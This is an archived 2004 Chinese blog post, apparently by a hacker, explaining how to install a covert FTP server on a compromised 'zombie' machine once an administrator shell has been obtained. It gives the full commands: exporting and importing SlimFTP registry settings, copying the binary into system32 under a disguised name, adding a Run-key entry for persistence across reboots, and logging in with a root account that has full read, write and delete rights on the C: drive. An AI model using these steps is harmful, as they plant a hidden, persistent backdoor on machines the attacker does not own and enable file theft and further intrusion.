如何在肉鸡上安装隐蔽的ftp服务器 :: 『孤光剑隐』
来源: BlogBus 原始链接: http://www.blogbus.com:80/blogbus/blog/diary.php?diaryid=474725 存档链接: https://web.archive.org/web/20041107102109id_/http://www.blogbus.com:80/blogbus/blog/diary.php?diaryid=474725
在Form域中Post大于100K的数据 ASP验证码的程序及原理 自动生成插入,修改的SQL Shell下的快乐 脚本故事 盗bbs密码的东西(代码) 四川成都攻防大赛技术细节与个人评论 SAM的散列存储加密解密算法以及SYSKEY的计算 高层协议POP3与HTTP 最佳的数据库分页方法 andy dreamtheater Angel showlife tx7do charcs charcs chensun netsky xhacker jpxiong Flier lgx KKQQ Ziqi redsaga spy88B8 Luzhu NetKnave eVan SUNU Taynni wuhui CAT Neeao Iceberg kaspersky KusTa Hoky eviloctal lam Net・PoliCe Jace Hardy Gusu・Lanye lilo xiaolu knIfe mifor kaka Lo7e4L Super・Hei lichdr yysun testnet soul Archonwang lamp FlyWeb <<<跨服务器上传文件最佳解决方案 | 首页 | CCProxy Log Stack Overflow 漏洞浅析>>> 如何在肉鸡上安装隐蔽的ftp服务器 时间: 2004-11-03 我们在入侵别人机器时候,经常需要一个ftp服务器。去申请的主页空间附带的ftp服务器常常有各种限制,而且,不小心就会暴露了自己的身份。因此,建立一个自己专用的ftp服务器,是很有用的。经过我一阵疯狂搜索,终于找到了slimftp这个好东东(下载地址: http://netsill.com/download/download.asp?Did=1981 ),首先,它身材小巧,而且不需要安装,在console下就可以运行,绝对不会弹出窗口,提供了标准的上传、下载功能,而且可以更改服务端口、设置用户权限等。关于slimftp的功能,请参考它的说明文档。 在这里,我假定大家已经获得了一个管理员或者系统权限的shell,这是安装它必需的权限。 安装步骤:分为本地设置和服务器设置。 本地设置:将本文附带的文件全部放在一个文件夹里面,这里是d:\ftp,然后运行adminftp.exe。运行窗口分成三部分,最上面是服务器的参数的设置,左下方是用户帐号的设置,右下方是访问目录的设置。 对于服务器参数的设置,只需要对server port(服务器端口)进行一下设置就可以了,因为服务器上通常还运行有ftp服务器,所以,我们改一个不一样的端口,这里我是设置了3323,另外两个参数就不用管了。然后,我们再添加一个用户,点一下new,输入一个用户名root,再选中这个用户,输入一个密码nopass 。最后,在localroot上输入一个路径c:\,这是作为root用户的根目录的,点一下new,在弹出的窗口上输入 / 就可以了,再将下面的四个权限全部钩上吧。read权限允许用户下载文件,write权限允许用户上传文件,list权限允许用户看目录列表,admin权限允许用户重命令和删除ftp服务器上的文件。如果需要,还可以创建多个用户,这就要看你了。 进入命令行,切换目录到d:\ftp,输入 :reg export "HKLM\SOFTWARE\WhitSoft Development" ftp.reg 现在本地操作已经全部完成了。 远程操作:将 ftp.reg 、slimftp2.exe、reg.exe都上传到肉鸡上,然后将slimftp2.exe拷贝到肉鸡的系统目录(通常为c:\winnt\system32,假如不存在)上。再运行: reg import ftp.reg reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v Winsock2up /d slimftp2.exe copy slimftp2.exe %systemroot%\system32 slimftp2.exe 运行copy slimftp2.exe %systemroot%\system32这步的时候有时会提示出错,这是因为slimftp2.exe已经是在系统目录上了。最后,删除 ftp.reg 吧!。 呵呵,一切都完成了,即使肉鸡重启我们的ftp服务器也会照样运行的。 不过,这个服务器的端口有点特别,我们怎么访问呢? 假如是用ie,这样输入就好了 ftp://root:nopass@192.168.0.1:3323/ 将192.168.0.1替换成你服务器的ip就可以了。dos下的ftp呢?这样! ftp open 192.168.0.1 3323 root nopass 注意事项:你可以将slimftp2.exe的文件名、服务端口更改,但是,相应的步骤输入也应该更改。 比如,我将slimftp2.exe改名叫wsockup.exe,那么: reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v Winsock2up /d slimftp2.exe 就应该变为:reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v Winsock2up /d wsockup.exe 孤光剑隐 发表于 2004-11-03 09:15 引用Trackback(0) | 编辑 评论 发表评论